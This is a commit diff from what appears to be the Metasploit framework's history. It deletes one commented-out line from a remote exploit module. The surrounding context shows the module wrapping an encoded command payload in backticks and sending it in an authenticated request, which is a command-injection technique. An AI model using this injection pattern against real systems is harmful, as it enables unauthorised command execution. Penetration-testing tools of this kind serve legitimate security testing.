little cleanump

bug/bundler_fix
m-1-k-3 2013-04-04 17:33:46 +02:00
parent f07117fe7d
commit 67f0b1b6ee
1 changed files with 0 additions and 1 deletions

View File

@ -494,7 +494,6 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
cmd = payload.encoded
#cmd = Rex::Text.uri_encode(payload.encoded)
cmd = "`#{cmd}`"
res = request(cmd,user,pass,uri)
if (!res)